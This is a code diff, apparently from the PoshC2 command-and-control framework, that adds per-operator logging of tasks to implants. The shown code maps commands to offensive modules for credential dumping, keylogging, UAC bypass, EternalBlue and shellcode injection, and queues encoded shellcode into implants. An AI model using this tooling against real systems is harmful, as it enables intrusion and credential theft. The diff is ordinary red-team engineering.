Add config option LogUsers, false by default but it set to true will prompt for a username (or can pass one to ImplantHandler with -u <name> or --u <name>). Tasks run by that user will then be logged as that user.

AutoLoads.py

@@ -4,7 +4,7 @@ from DB import *
 from Config import *
 import os, base64
 
-def check_module_loaded( module_name, randomuri, force=False ):
+def check_module_loaded( module_name, randomuri, user, force=False ):
   try:
     modules_loaded = select_mods(randomuri)
     if force:
@@ -13,7 +13,7 @@ def check_module_loaded( module_name, randomuri, force=False ):
           module_name = modname
       file = open(("%s%s" % (ModulesDirectory,module_name)), "r")
       module = file.read()
-      new_task(("loadmodule %s" % module_name), randomuri)
+      new_task(("loadmodule %s" % module_name), user, randomuri)
     if modules_loaded:
       new_modules_loaded = "%s %s" % (modules_loaded, module_name)
       if module_name in modules_loaded:
@@ -24,117 +24,117 @@ def check_module_loaded( module_name, randomuri, force=False ):
             module_name = modname
         file = open(("%s%s" % (ModulesDirectory,module_name)), "r")
         module = file.read()
-        new_task(("loadmodule %s" % module_name), randomuri)
+        new_task(("loadmodule %s" % module_name), user, randomuri)
         update_mods(new_modules_loaded, randomuri)
     else:
       new_modules_loaded = "%s" % (module_name)
       file = open(("%s%s" % (ModulesDirectory,module_name)), "r")
       module = file.read()
-      new_task(("loadmodule %s" % module_name), randomuri)
+      new_task(("loadmodule %s" % module_name), user, randomuri)
       update_mods(new_modules_loaded, randomuri)
   except Exception as e:
     print ("Error loadmodule: %s" % e)
 
-def run_autoloads(command, randomuri):
+def run_autoloads(command, randomuri, user):
-  if "invoke-eternalblue" in command.lower(): check_module_loaded("Exploit-EternalBlue.ps1", randomuri)
+  if "invoke-eternalblue" in command.lower(): check_module_loaded("Exploit-EternalBlue.ps1", randomuri, user)
-  if "invoke-psuacme" in command.lower(): check_module_loaded("Invoke-PsUACme.ps1", randomuri)
+  if "invoke-psuacme" in command.lower(): check_module_loaded("Invoke-PsUACme.ps1", randomuri, user)
-  if "bloodhound" in command.lower(): check_module_loaded("BloodHound.ps1", randomuri)
+  if "bloodhound" in command.lower(): check_module_loaded("BloodHound.ps1", randomuri, user)
-  if "brute-ad" in command.lower(): check_module_loaded("Brute-AD.ps1", randomuri)
+  if "brute-ad" in command.lower(): check_module_loaded("Brute-AD.ps1", randomuri, user)
-  if "brute-locadmin" in command.lower(): check_module_loaded("Brute-LocAdmin.ps1", randomuri)
+  if "brute-locadmin" in command.lower(): check_module_loaded("Brute-LocAdmin.ps1", randomuri, user)
-  if "bypass-uac" in command.lower(): check_module_loaded("Bypass-UAC.ps1", randomuri)
+  if "bypass-uac" in command.lower(): check_module_loaded("Bypass-UAC.ps1", randomuri, user)
-  if "cred-popper" in command.lower(): check_module_loaded("Cred-Popper.ps1", randomuri)
+  if "cred-popper" in command.lower(): check_module_loaded("Cred-Popper.ps1", randomuri, user)
-  if "cve-2016-9192" in command.lower(): check_module_loaded("CVE-2016-9192.ps1", randomuri)
+  if "cve-2016-9192" in command.lower(): check_module_loaded("CVE-2016-9192.ps1", randomuri, user)
-  if "convertto-shellcode" in command.lower(): check_module_loaded("ConvertTo-Shellcode.ps1", randomuri)
+  if "convertto-shellcode" in command.lower(): check_module_loaded("ConvertTo-Shellcode.ps1", randomuri, user)
-  if "decrypt-rdcman" in command.lower(): check_module_loaded("Decrypt-RDCMan.ps1", randomuri)
+  if "decrypt-rdcman" in command.lower(): check_module_loaded("Decrypt-RDCMan.ps1", randomuri, user)
-  if "dump-ntds" in command.lower(): check_module_loaded("Dump-NTDS.ps1", randomuri)
+  if "dump-ntds" in command.lower(): check_module_loaded("Dump-NTDS.ps1", randomuri, user)
-  if "get-computerinfo" in command.lower(): check_module_loaded("Get-ComputerInfo.ps1", randomuri)
+  if "get-computerinfo" in command.lower(): check_module_loaded("Get-ComputerInfo.ps1", randomuri, user)
-  if "get-creditcarddata" in command.lower(): check_module_loaded("Get-CreditCardData.ps1", randomuri)
+  if "get-creditcarddata" in command.lower(): check_module_loaded("Get-CreditCardData.ps1", randomuri, user)
-  if "get-gppautologon" in command.lower(): check_module_loaded("Get-GPPAutologon.ps1", randomuri)
+  if "get-gppautologon" in command.lower(): check_module_loaded("Get-GPPAutologon.ps1", randomuri, user)
-  if "get-gpppassword" in command.lower(): check_module_loaded("Get-GPPPassword.ps1", randomuri)
+  if "get-gpppassword" in command.lower(): check_module_loaded("Get-GPPPassword.ps1", randomuri, user)
-  if "get-idletime" in command.lower(): check_module_loaded("Get-IdleTime.ps1", randomuri)
+  if "get-idletime" in command.lower(): check_module_loaded("Get-IdleTime.ps1", randomuri, user)
-  if "get-ipconfig" in command.lower(): check_module_loaded("Get-IPConfig.ps1", randomuri)
+  if "get-ipconfig" in command.lower(): check_module_loaded("Get-IPConfig.ps1", randomuri, user)
-  if "get-keystrokes" in command.lower(): check_module_loaded("Get-Keystrokes.ps1", randomuri)
+  if "get-keystrokes" in command.lower(): check_module_loaded("Get-Keystrokes.ps1", randomuri, user)
-  if "get-hash" in command.lower(): check_module_loaded("Get-Hash.ps1", randomuri)
+  if "get-hash" in command.lower(): check_module_loaded("Get-Hash.ps1", randomuri, user)
-  if "get-locadm" in command.lower(): check_module_loaded("Get-LocAdm.ps1", randomuri)
+  if "get-locadm" in command.lower(): check_module_loaded("Get-LocAdm.ps1", randomuri, user)
-  if "get-mshotfixes" in command.lower(): check_module_loaded("Get-MSHotFixes.ps1", randomuri)
+  if "get-mshotfixes" in command.lower(): check_module_loaded("Get-MSHotFixes.ps1", randomuri, user)
-  if "get-netstat" in command.lower(): check_module_loaded("Get-Netstat.ps1", randomuri)
+  if "get-netstat" in command.lower(): check_module_loaded("Get-Netstat.ps1", randomuri, user)
-  if "get-passnotexp" in command.lower(): check_module_loaded("Get-PassNotExp.ps1", randomuri)
+  if "get-passnotexp" in command.lower(): check_module_loaded("Get-PassNotExp.ps1", randomuri, user)
-  if "get-passpol" in command.lower(): check_module_loaded("Get-PassPol.ps1", randomuri)
+  if "get-passpol" in command.lower(): check_module_loaded("Get-PassPol.ps1", randomuri, user)
-  if "get-recentfiles" in command.lower(): check_module_loaded("Get-RecentFiles.ps1", randomuri)
+  if "get-recentfiles" in command.lower(): check_module_loaded("Get-RecentFiles.ps1", randomuri, user)
-  if "get-serviceperms" in command.lower(): check_module_loaded("Get-ServicePerms.ps1", randomuri)
+  if "get-serviceperms" in command.lower(): check_module_loaded("Get-ServicePerms.ps1", randomuri, user)
-  if "get-userinfo" in command.lower(): check_module_loaded("Get-UserInfo.ps1", randomuri)
+  if "get-userinfo" in command.lower(): check_module_loaded("Get-UserInfo.ps1", randomuri, user)
-  if "get-wlanpass" in command.lower(): check_module_loaded("Get-WLANPass.ps1", randomuri)
+  if "get-wlanpass" in command.lower(): check_module_loaded("Get-WLANPass.ps1", randomuri, user)
-  if "invoke-pbind" in command.lower(): check_module_loaded("Invoke-Pbind.ps1", randomuri)
+  if "invoke-pbind" in command.lower(): check_module_loaded("Invoke-Pbind.ps1", randomuri, user)
-  if "get-domaingroupmember" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "get-domaingroupmember" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "invoke-kerberoast" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "invoke-kerberoast" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "invoke-userhunter" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "invoke-userhunter" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "invoke-hostenum" in command.lower(): check_module_loaded("HostEnum.ps1", randomuri)
+  if "invoke-hostenum" in command.lower(): check_module_loaded("HostEnum.ps1", randomuri, user)
-  if "inject-shellcode" in command.lower(): check_module_loaded("Inject-Shellcode.ps1", randomuri)
+  if "inject-shellcode" in command.lower(): check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
-  if "inveigh-relay" in command.lower(): check_module_loaded("Inveigh-Relay.ps1", randomuri)
+  if "inveigh-relay" in command.lower(): check_module_loaded("Inveigh-Relay.ps1", randomuri, user)
-  if "inveigh" in command.lower(): check_module_loaded("Inveigh.ps1", randomuri)
+  if "inveigh" in command.lower(): check_module_loaded("Inveigh.ps1", randomuri, user)
-  if "invoke-arpscan" in command.lower(): check_module_loaded("Invoke-Arpscan.ps1", randomuri)
+  if "invoke-arpscan" in command.lower(): check_module_loaded("Invoke-Arpscan.ps1", randomuri, user)
-  if "arpscan" in command.lower(): check_module_loaded("Invoke-Arpscan.ps1", randomuri)
+  if "arpscan" in command.lower(): check_module_loaded("Invoke-Arpscan.ps1", randomuri, user)
-  if "invoke-dcsync" in command.lower(): check_module_loaded("Invoke-DCSync.ps1", randomuri)
+  if "invoke-dcsync" in command.lower(): check_module_loaded("Invoke-DCSync.ps1", randomuri, user)
-  if "invoke-eventvwrbypass" in command.lower(): check_module_loaded("Invoke-EventVwrBypass.ps1", randomuri)
+  if "invoke-eventvwrbypass" in command.lower(): check_module_loaded("Invoke-EventVwrBypass.ps1", randomuri, user)
-  if "invoke-hostscan" in command.lower(): check_module_loaded("Invoke-Hostscan.ps1", randomuri)
+  if "invoke-hostscan" in command.lower(): check_module_loaded("Invoke-Hostscan.ps1", randomuri, user)
-  if "invoke-ms16-032-proxy" in command.lower(): check_module_loaded("Invoke-MS16-032-Proxy.ps1", randomuri)
+  if "invoke-ms16-032-proxy" in command.lower(): check_module_loaded("Invoke-MS16-032-Proxy.ps1", randomuri, user)
-  if "invoke-ms16-032" in command.lower(): check_module_loaded("Invoke-MS16-032.ps1", randomuri)
+  if "invoke-ms16-032" in command.lower(): check_module_loaded("Invoke-MS16-032.ps1", randomuri, user)
-  if "invoke-mimikatz" in command.lower(): check_module_loaded("Invoke-Mimikatz.ps1", randomuri)
+  if "invoke-mimikatz" in command.lower(): check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user)
-  if "invoke-psinject" in command.lower(): check_module_loaded("Invoke-PSInject.ps1", randomuri)
+  if "invoke-psinject" in command.lower(): check_module_loaded("Invoke-PSInject.ps1", randomuri, user)
-  if "invoke-pipekat" in command.lower(): check_module_loaded("Invoke-Pipekat.ps1", randomuri)
+  if "invoke-pipekat" in command.lower(): check_module_loaded("Invoke-Pipekat.ps1", randomuri, user)
-  if "invoke-portscan" in command.lower(): check_module_loaded("Invoke-Portscan.ps1", randomuri)
+  if "invoke-portscan" in command.lower(): check_module_loaded("Invoke-Portscan.ps1", randomuri, user)
-  if "invoke-powerdump" in command.lower(): check_module_loaded("Invoke-PowerDump.ps1", randomuri)
+  if "invoke-powerdump" in command.lower(): check_module_loaded("Invoke-PowerDump.ps1", randomuri, user)
-  if "invoke-psexec" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri)
+  if "invoke-psexec" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri, user)
-  if "invoke-reflectivepeinjection" in command.lower(): check_module_loaded("Invoke-ReflectivePEInjection.ps1", randomuri)
+  if "invoke-reflectivepeinjection" in command.lower(): check_module_loaded("Invoke-ReflectivePEInjection.ps1", randomuri, user)
-  if "invoke-reversednslookup" in command.lower(): check_module_loaded("Invoke-ReverseDnsLookup.ps1", randomuri)
+  if "invoke-reversednslookup" in command.lower(): check_module_loaded("Invoke-ReverseDnsLookup.ps1", randomuri, user)
-  if "invoke-runas" in command.lower(): check_module_loaded("Invoke-RunAs.ps1", randomuri)
+  if "invoke-runas" in command.lower(): check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
-  if "invoke-smblogin" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri)
+  if "invoke-smblogin" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri, user)
-  if "invoke-smbclient" in command.lower(): check_module_loaded("Invoke-SMBClient.ps1", randomuri)
+  if "invoke-smbclient" in command.lower(): check_module_loaded("Invoke-SMBClient.ps1", randomuri, user)
-  if "invoke-smbexec" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri)
+  if "invoke-smbexec" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri, user)
-  if "invoke-psexec" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri)
+  if "invoke-psexec" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri, user)
-  if "invoke-shellcode" in command.lower(): check_module_loaded("Invoke-Shellcode.ps1", randomuri)
+  if "invoke-shellcode" in command.lower(): check_module_loaded("Invoke-Shellcode.ps1", randomuri, user)
-  if "invoke-sniffer" in command.lower(): check_module_loaded("Invoke-Sniffer.ps1", randomuri)
+  if "invoke-sniffer" in command.lower(): check_module_loaded("Invoke-Sniffer.ps1", randomuri, user)
-  if "invoke-sqlquery" in command.lower(): check_module_loaded("Invoke-SqlQuery.ps1", randomuri)
+  if "invoke-sqlquery" in command.lower(): check_module_loaded("Invoke-SqlQuery.ps1", randomuri, user)
-  if "invoke-tater" in command.lower(): check_module_loaded("Invoke-Tater.ps1", randomuri)
+  if "invoke-tater" in command.lower(): check_module_loaded("Invoke-Tater.ps1", randomuri, user)
-  if "invoke-thehash" in command.lower(): check_module_loaded("Invoke-TheHash.ps1", randomuri)
+  if "invoke-thehash" in command.lower(): check_module_loaded("Invoke-TheHash.ps1", randomuri, user)
-  if "invoke-tokenmanipulation" in command.lower(): check_module_loaded("Invoke-TokenManipulation.ps1", randomuri)
+  if "invoke-tokenmanipulation" in command.lower(): check_module_loaded("Invoke-TokenManipulation.ps1", randomuri, user)
-  if "invoke-wmichecker" in command.lower(): check_module_loaded("Invoke-WMIChecker.ps1", randomuri)
+  if "invoke-wmichecker" in command.lower(): check_module_loaded("Invoke-WMIChecker.ps1", randomuri, user)
-  if "invoke-wmicommand" in command.lower(): check_module_loaded("Invoke-WMICommand.ps1", randomuri)
+  if "invoke-wmicommand" in command.lower(): check_module_loaded("Invoke-WMICommand.ps1", randomuri, user)
-  if "invoke-wscriptbypassuac" in command.lower(): check_module_loaded("Invoke-WScriptBypassUAC.ps1", randomuri)
+  if "invoke-wscriptbypassuac" in command.lower(): check_module_loaded("Invoke-WScriptBypassUAC.ps1", randomuri, user)
-  if "invoke-winrmsession" in command.lower(): check_module_loaded("Invoke-WinRMSession.ps1", randomuri)
+  if "invoke-winrmsession" in command.lower(): check_module_loaded("Invoke-WinRMSession.ps1", randomuri, user)
-  if "out-minidump" in command.lower(): check_module_loaded("Out-Minidump.ps1", randomuri)
+  if "out-minidump" in command.lower(): check_module_loaded("Out-Minidump.ps1", randomuri, user)
-  if "portscan" in command.lower(): check_module_loaded("PortScanner.ps1", randomuri)
+  if "portscan" in command.lower(): check_module_loaded("PortScanner.ps1", randomuri, user)
-  if "powercat" in command.lower(): check_module_loaded("powercat.ps1", randomuri)
+  if "powercat" in command.lower(): check_module_loaded("powercat.ps1", randomuri, user)
-  if "invoke-allchecks" in command.lower(): check_module_loaded("PowerUp.ps1", randomuri)
+  if "invoke-allchecks" in command.lower(): check_module_loaded("PowerUp.ps1", randomuri, user)
-  if "set-lhstokenprivilege" in command.lower(): check_module_loaded("Set-LHSTokenPrivilege.ps1", randomuri)
+  if "set-lhstokenprivilege" in command.lower(): check_module_loaded("Set-LHSTokenPrivilege.ps1", randomuri, user)
-  if "sharpsocks" in command.lower(): check_module_loaded("SharpSocks.ps1", randomuri)
+  if "sharpsocks" in command.lower(): check_module_loaded("SharpSocks.ps1", randomuri, user)
-  if "find-allvulns" in command.lower(): check_module_loaded("Sherlock.ps1", randomuri)
+  if "find-allvulns" in command.lower(): check_module_loaded("Sherlock.ps1", randomuri, user)
-  if "test-adcredential" in command.lower(): check_module_loaded("Test-ADCredential.ps1", randomuri)
+  if "test-adcredential" in command.lower(): check_module_loaded("Test-ADCredential.ps1", randomuri, user)
-  if "new-zipfile" in command.lower(): check_module_loaded("Zippy.ps1", randomuri)
+  if "new-zipfile" in command.lower(): check_module_loaded("Zippy.ps1", randomuri, user)
-  if "get-netuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "get-netuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "invoke-aclscanner" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "invoke-aclscanner" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "get-dfsshare" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "get-dfsshare" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "get-objectacl" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "get-objectacl" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "add-objectacl" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "add-objectacl" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "get-netuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "get-netuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "get-domainuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "get-domainuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "get-netcomputer" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "get-netcomputer" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "get-domaincomputer" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "get-domaincomputer" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "get-netuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "get-netuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "get-netgroup" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "get-netgroup" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "get-netgroupmember" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "get-netgroupmember" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "get-netshare" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "get-netshare" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "invoke-sharefinder" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "invoke-sharefinder" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "get-netdomain" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "get-netdomain" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "get-netdomaincontroller" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "get-netdomaincontroller" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "get-netforest" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "get-netforest" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "get-netforestdomain" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "get-netforestdomain" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "invoke-mapdomaintrust" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "invoke-mapdomaintrust" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "get-wmireglastloggedon" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "get-wmireglastloggedon" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "get-wmiregcachedrdpconnection" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "get-wmiregcachedrdpconnection" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "get-wmiregmounteddrive" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "get-wmiregmounteddrive" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
-  if "invoke-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri)
+  if "invoke-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user)
-  if "remove-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri)
+  if "remove-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user)
-  if "invoke-wmi" in command.lower(): check_module_loaded("Invoke-WMIExec.ps1", randomuri)
+  if "invoke-wmi" in command.lower(): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
-  if "get-lapspasswords" in command.lower(): check_module_loaded("Get-LAPSPasswords.ps1", randomuri)
+  if "get-lapspasswords" in command.lower(): check_module_loaded("Get-LAPSPasswords.ps1", randomuri, user)
   

Config.py

@@ -17,6 +17,7 @@ QuickCommand = urlConfig.fetchQCUrl()
 DownloadURI = urlConfig.fetchConnUrl()
 Sounds = "No"
 ServerPort = "443"
+LogUsers = True 
 EnableNotifications = "No"
 
 # ClockworkSMS - https://www.clockworksms.com

DB.py

@@ -42,7 +42,8 @@ def initializedb():
   create_newtasks = """CREATE TABLE NewTasks (
         TaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,
         RandomURI TEXT,
-        Command TEXT);"""
+        Command TEXT,
+        User TEXT);"""
 
   create_urls = """CREATE TABLE URLs (
         URLID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,
@@ -137,7 +138,7 @@ def get_implants_all():
   else:
     return None
 
-def get_nettasks_all():
+def get_newtasks_all():
   conn = sqlite3.connect(DB)
   conn.row_factory = sqlite3.Row
   c = conn.cursor()
@@ -155,18 +156,18 @@ def new_urldetails( RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPas
   c.execute("INSERT INTO URLs (RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry) VALUES (?, ?, ?, ?, ?, ?, ?)",(RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry))
   conn.commit()
 
-def drop_nettasks():
+def drop_newtasks():
   conn = sqlite3.connect(DB)
   conn.row_factory = sqlite3.Row
   c = conn.cursor()
   c.execute("DELETE FROM NewTasks ")
   conn.commit()
 
-def new_task( task, randomuri ):
+def new_task( task, user, randomuri ):
   conn = sqlite3.connect(DB)
   conn.text_factory = str
   c = conn.cursor()
-  c.execute("INSERT INTO NewTasks (RandomURI, Command) VALUES (?, ?)",(randomuri, task))
+  c.execute("INSERT INTO NewTasks (RandomURI, Command, User) VALUES (?, ?, ?)",(randomuri, task, user))
   conn.commit()
 
 def get_lastcommand():

Implant.py

@@ -101,10 +101,9 @@ IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDa
     new_implant(self.RandomURI, self.User, self.Hostname, self.IPAddress, self.Key, self.FirstSeen, self.FirstSeen, self.PID, self.Proxy, self.Arch, self.Domain, self.Alive, self.Sleep, self.ModsLoaded, self.Pivot, self.Label)
 
   def autoruns(self):
-    new_task("loadmodule Core.ps1", self.RandomURI)
+    new_task("loadmodule Core.ps1", "autoruns", self.RandomURI)
     update_mods("Core.ps1", self.RandomURI)
     result = get_autoruns()
     if result:
-      autoruns = ""
       for autorun in result:
-        new_task(autorun[1], self.RandomURI)
+        new_task(autorun[1], "autoruns", self.RandomURI)

ImplantHandler.py

@@ -1,6 +1,6 @@
 #!/usr/bin/python
  
-import os, time, readline, base64, re, traceback, glob, sys, argparse, shlex, signal, subprocess
+import os, time, readline, base64, re, traceback, glob, sys, argparse, shlex, signal, subprocess, argparse
 import datetime
 from datetime import datetime, timedelta
 from sqlite3 import Error
@@ -37,7 +37,7 @@ def createproxypayload():
   newPayload.CreateEXE("Proxy")
   newPayload.CreateMsbuild("Proxy")
   new_urldetails( "Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire )
-  startup("Created new proxy payloads")
+  startup(user, "Created new proxy payloads")
 
 def createdaisypayload():
   name = raw_input("Daisy name: e.g. DC1 ")
@@ -58,7 +58,7 @@ def createdaisypayload():
   newPayload.CreateEXE(name)
   newPayload.CreateMsbuild(name)
   new_urldetails( name, C2[1], C2[3], domain, daisyurl, daisyhostid, "" )
-  startup("Created new %s daisy payloads" % name)
+  startup(user, "Created new %s daisy payloads" % name)
 
 def createnewpayload():
   domain = raw_input("Domain or URL: https://www.example.com ")
@@ -90,7 +90,7 @@ def createnewpayload():
   newPayload.CreateMsbuild("%s_" % domainbase)
   newPayload.CreatePython("%s_" % domainbase)
   new_urldetails( randomid, domain, domainfront, proxyurl, proxyuser, proxypass, credsexpire )
-  startup("Created new payloads")
+  startup(user, "Created new payloads")
 
 def argp(cmd):
   args = ""
@@ -156,11 +156,12 @@ def migrate(randomuri, params=""):
   elif implant_comms == "Proxy":
     shellcodefile = load_file("%s/payloads/ProxyPosh-shellcode_x%s.bin" % (ROOTDIR,arch))
 
-  check_module_loaded("Inject-Shellcode.ps1", randomuri)
+  check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
-  new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), randomuri)
+  new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
-  new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), randomuri)
+  new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
+
+def startup(user, printhelp = ""):
 
-def startup(printhelp = ""):
   try:
     if os.name == 'nt':
       os.system('cls')
@@ -174,6 +175,10 @@ def startup(printhelp = ""):
   print (Colours.END + "")
 
   try:
+    if user is not None:
+      print (Colours.GREEN)
+      print ("User: %s" % user)
+      print (Colours.END)
     ii = get_implants()
     if ii:
       for i in ii:
@@ -247,7 +252,7 @@ def startup(printhelp = ""):
         ExError = e
 
     if (implant_id == "") or (implant_id.lower() == "back") or (implant_id.lower() == "clear"):
-      startup()
+      startup(user)
 
     if "output-to-html" in implant_id.lower():
       generate_table("Tasks")
@@ -256,55 +261,55 @@ def startup(printhelp = ""):
       generate_table("Implants")
       graphviz()
       time.sleep(1)
-      startup()
+      startup(user)
     if ("show-urls" in implant_id.lower()) or ("list-urls" in implant_id.lower()):
       urls = get_c2urls()
       urlformatted = "RandomID  URL  HostHeader  ProxyURL  ProxyUsername  ProxyPassword  CredentialExpiry\n"
       for i in urls:
         urlformatted += "%s  %s  %s  %s  %s  %s  %s  %s \n" % (i[0],i[1],i[2],i[3],i[4],i[5],i[6],i[7])
-      startup(urlformatted)
+      startup(user, urlformatted)
     if "add-autorun" in implant_id.lower():
       autorun = (implant_id.lower()).replace("add-autorun ","")
       autorun = autorun.replace("add-autorun","")
       add_autorun(autorun)
-      startup("add-autorun: %s\r\n" % autorun)
+      startup(user, "add-autorun: %s\r\n" % autorun)
     if "list-autorun" in implant_id.lower():
       autoruns = get_autorun()
-      startup(autoruns)
+      startup(user, autoruns)
     if "del-autorun" in implant_id.lower():
       autorun = (implant_id.lower()).replace("del-autorun ","")
       del_autorun(autorun)
-      startup("deleted autorun\r\n")
+      startup(user, "deleted autorun\r\n")
     if "nuke-autorun" in implant_id.lower():
       del_autoruns()
-      startup("nuked autoruns\r\n")
+      startup(user, "nuked autoruns\r\n")
     if (implant_id.lower() == "automigrate-frompowershell") or (implant_id.lower() == "am"):
-      startup("automigrate not currently implemented for the Python version of PoshC2\r\n")
+      startup(user, "automigrate not currently implemented for the Python version of PoshC2\r\n")
     if "show-serverinfo" in implant_id.lower():
       i = get_c2server_all()
       detailsformatted = "\nHostnameIP: %s\nEncKey: %s\nDomainFrontHeader: %s\nDefaultSleep: %s\nKillDate: %s\nHTTPResponse: %s\nFolderPath: %s\nServerPort: %s\nQuickCommand: %s\nDefaultProxyURL: %s\nDefaultProxyUser: %s\nDefaultProxyPass: %s\nEnableSounds: %s\nAPIKEY: %s\nMobileNumber: %s\nURLS: %s\n%sSocksURLS: %s\nInsecure: %s\nUserAgent: %s\nReferer: %s\nAPIToken: %s\nAPIUser: %s\nEnableNotifications: %s" % (i[1],i[2],i[3],i[4],i[5],i[6],i[7],i[8],i[9],i[10],i[11],i[12],i[13],i[14],i[15],i[16],i[17],i[18],i[19],i[20],i[21],i[22],i[23],i[24])
-      startup(detailsformatted)
+      startup(user, detailsformatted)
     if "turnoff-notifications" in implant_id.lower():
       update_item("EnableNotifications", "C2Server", "No")
-      startup("Turned off notifications on new implant")
+      startup(user, "Turned off notifications on new implant")
     if "turnon-notifications" in implant_id.lower():
       update_item("EnableNotifications", "C2Server", "Yes")
-      startup("Turned on notifications on new implant")
+      startup(user, "Turned on notifications on new implant")
     if "set-clockworksmsapikey" in implant_id.lower():
       cmd = (implant_id.lower()).replace("set-clockworksmsapikey ","")
       cmd = cmd.replace("set-clockworksmsapikey","")
       update_item("MobileNumber", "C2Server", cmd)
-      startup("Updated set-clockworksmsapikey: %s\r\n" % cmd)
+      startup(user, "Updated set-clockworksmsapikey: %s\r\n" % cmd)
     if "set-clockworksmsnumber" in implant_id.lower():
       cmd = (implant_id.lower()).replace("set-clockworksmsnumber ","")
       cmd = cmd.replace("set-clockworksmsnumber","")
       update_item("APIKEY", "C2Server", cmd)
-      startup("Updated set-clockworksmsnumber (Restart C2 Server): %s\r\n" % cmd)
+      startup(user, "Updated set-clockworksmsnumber (Restart C2 Server): %s\r\n" % cmd)
     if "set-defaultbeacon" in implant_id.lower():
       cmd = (implant_id.lower()).replace("set-defaultbeacon ","")
       cmd = cmd.replace("set-defaultbeacon","")
       update_item("DefaultSleep", "C2Server", cmd)
-      startup("Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % cmd)
+      startup(user, "Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % cmd)
     if "opsec" in implant_id.lower():
       implants = get_implants_all()
       comtasks = get_tasks()
@@ -332,38 +337,38 @@ def startup(printhelp = ""):
           line = line.replace('\r','')
           filenameuploaded = line.rstrip().split(":",1)[1]
